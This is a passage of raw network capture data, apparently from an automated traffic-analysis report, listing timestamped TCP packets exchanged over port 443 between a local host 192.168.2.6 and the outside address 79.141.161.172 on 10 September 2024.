                                                                                Sep 10, 2024 16:33:48.733891010 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.734116077 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.734143019 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.735179901 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.735200882 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.735301018 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.735301018 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.735323906 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.735511065 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.735528946 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.735613108 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.735613108 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.735630035 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.736099005 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.736118078 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.736201048 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.736201048 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.736217022 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.737093925 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.737107992 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.737195015 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.737195969 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.737210035 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.738461018 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.738478899 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.738533974 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.738547087 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.738589048 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.738929987 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.738945961 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.739062071 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.739075899 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.772129059 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.772151947 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.772274971 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.772274971 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.772346020 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.822685957 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.822705984 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.822865009 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.822865963 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.822941065 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.822999954 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.823019981 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.823112965 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.823112965 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.823132038 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.823743105 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.823757887 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.823832035 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.823853970 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.823878050 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.824203968 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.824222088 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.824304104 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.824305058 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.824320078 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.825218916 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.825234890 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.825314999 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.825329065 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.825376034 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.826656103 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.826673985 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.826718092 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.826734066 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.826782942 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.827060938 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.827078104 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.827153921 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.827153921 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.827169895 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.860657930 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.860680103 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.860764980 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.860835075 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.860882998 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.908426046 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.908442020 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.908612013 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.908638954 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.909909964 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.909954071 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.910006046 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.910024881 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.910072088 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.910521984 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.910541058 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.910624981 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.910624981 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.910644054 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.911171913 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.911190033 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.911253929 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.911253929 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.911271095 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.911979914 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.911993027 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.912072897 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.912072897 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.912091970 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.912823915 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.912906885 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.913443089 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.913458109 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.913543940 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.913543940 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.913559914 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.914016962 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.914033890 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.914076090 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.914089918 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.914134026 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.948050976 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.948067904 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.948168039 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.948184967 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.994776964 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.994797945 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.995024920 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.995024920 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.995068073 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.996042013 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.996056080 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.996160984 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.996160984 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.996182919 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.996465921 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.996484041 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.996579885 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.996579885 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.996597052 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.996952057 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.996963978 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.997555017 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.997570992 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.997653008 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.997670889 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.997848988 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.997865915 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.998948097 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.998960972 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.999030113 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.999043941 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.999589920 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.999610901 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.999675989 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.999691010 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.999725103 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.035731077 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.035748005 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.035813093 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.035840034 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.035854101 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.081650019 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.081672907 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.081811905 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.081811905 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.081852913 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.082801104 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.082822084 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.082885981 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.082918882 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.082942963 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.083533049 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.083551884 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.083605051 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.083620071 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.083647966 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.083986044 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.084001064 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.084055901 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.084069014 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.084098101 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.084825039 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.084845066 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.084903002 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.084916115 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.084943056 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.085894108 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.085907936 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.085963011 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.085977077 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.086009979 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.122204065 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.122226000 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.122319937 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.122319937 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.122391939 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.151151896 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.151166916 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.151228905 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.151238918 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.151258945 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.170351028 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.170380116 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.170466900 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.170541048 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.170577049 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.170769930 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.170784950 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.170855999 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.170876980 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.170902014 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.171489000 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.171510935 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.171564102 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.171582937 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.171608925 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.171803951 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.171818972 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.171875000 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.171891928 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.171916008 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.178304911 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.178325891 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.178386927 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.178400040 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.178426027 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.178709030 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.178724051 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.178900003 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.178914070 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.209157944 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.209187984 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.209255934 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.209327936 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.209362984 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.245687962 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.245743990 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.245778084 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.245786905 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.245815992 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.257169008 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.257240057 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.257278919 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.257298946 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.257325888 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.257998943 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.258018970 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.258057117 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.258076906 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.258075953 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.258088112 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.258117914 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.258157969 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.258613110 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.258625984 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.258706093 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.258718014 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.258743048 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.258785009 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.265281916 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.265295982 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.265357971 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.265374899 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.265398979 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.265434027 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.265778065 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.265789986 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.265846014 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.265862942 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.265885115 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.265923023 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.296087980 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.296102047 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.296343088 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.296343088 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.296375990 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.296437025 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.334106922 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.334122896 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.334227085 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.334294081 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.334363937 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.346285105 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.346297979 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.346376896 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.346391916 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.346446037 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.346920013 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.346930981 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.347001076 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.347012997 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.347069979 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.347424984 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.347438097 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.347528934 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.347542048 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.347599983 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.348117113 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.348128080 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.348195076 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.348215103 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.348238945 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.348275900 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.354049921 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.354064941 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.354137897 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.354159117 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.354212046 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.354536057 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.354547977 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.354598045 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.354634047 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.354645967 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.354701042 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.382968903 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.382983923 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.383064032 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.383105040 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.383164883 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.421766043 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.421788931 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.421907902 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.421935081 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.421984911 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.437241077 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.437254906 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.437412977 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.437438011 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.437494040 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.441051960 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.441066027 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.441132069 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.441145897 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:49.441194057 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:49.450784922 CEST4434973379.141.161.172192.168.2.6
